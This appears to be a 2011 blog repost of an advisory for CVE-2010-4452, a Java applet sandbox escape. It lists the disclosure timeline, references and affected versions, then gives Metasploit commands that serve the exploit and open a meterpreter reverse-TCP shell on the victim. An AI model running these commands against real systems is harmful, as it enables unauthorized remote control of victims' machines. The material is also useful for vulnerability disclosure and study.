Sunday, March 20, 2011

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit: "

Timeline :


Vulnerability discovered by Frederic Hoguin

Vulnerability transmitted to ZDI by Frederic Hoguin

Vulnerability reported to the vendor by ZDI the 2010-09-28

Coordinated public release of advisory the 2011-02-15

Vulnerability details publicly released by Frederic Hoguin the 2011-03-11

Metasploit PoC provided the 2011-03-15



    PoC provided by :



Frederic Hoguin

jduck



    Reference(s) :



CVE-2010-4452

ZDI-11-084

OSVDB-71193

Oracle



    Affected version(s) :



Oracle JRE 6 & JDK 6 Update 23 and before



    Tested on Windows XP SP3 with :


    Oracle JRE 6 Update 16


    Description :



This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.



    Commands :



use exploit/windows/browser/java_codebase_trust

set SRVHOST 192.168.178.21

set PAYLOAD java/meterpreter/reverse_tcp

set LHOST 192.168.178.21

exploit


sysinfo

getuid